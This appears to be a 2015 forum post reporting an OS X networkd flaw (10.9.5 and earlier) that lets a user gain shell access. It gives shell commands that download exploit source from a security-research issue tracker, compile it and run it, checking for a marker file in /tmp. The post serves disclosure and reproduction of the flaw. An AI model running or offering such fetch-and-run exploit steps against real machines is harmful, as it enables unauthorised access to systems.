OS X currently has at least one active "zero day" (it was released to the public after 90 days of no fix from Apple). It exploits in a flaw with the networking daemon to gain shell access.
This flaw is exploitable on =<10.9.5. Yosemite is not affected. More alarming is that no antivirus currently blocks this executable.
Build the proof of concept:
gcc # launches dev tool installer if not present mkdir /tmp/networkd_poc cd /tmp/networkd_poc git clone firstname.lastname@example.org:rodionovd/liblorgnette.git curl 'https://google-security-research.googlecode.com/issues/attachment?aid=1210000000&name=sysmond_exploit_writeup.c&token=ABZ6GAe572CH9_WQUWSd2SBooTBV6ZZMjw%3A1421968517496' > networkd_exploit.c # may need to replace with your own link from https://code.google.com/p/google-security-research/issues/detail?id=121 clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation ./networkd_exploit ls /tmp | grep hello_ # should see hello_networkd
Edited by iangcarroll, 22 January 2015 - 06:22 PM.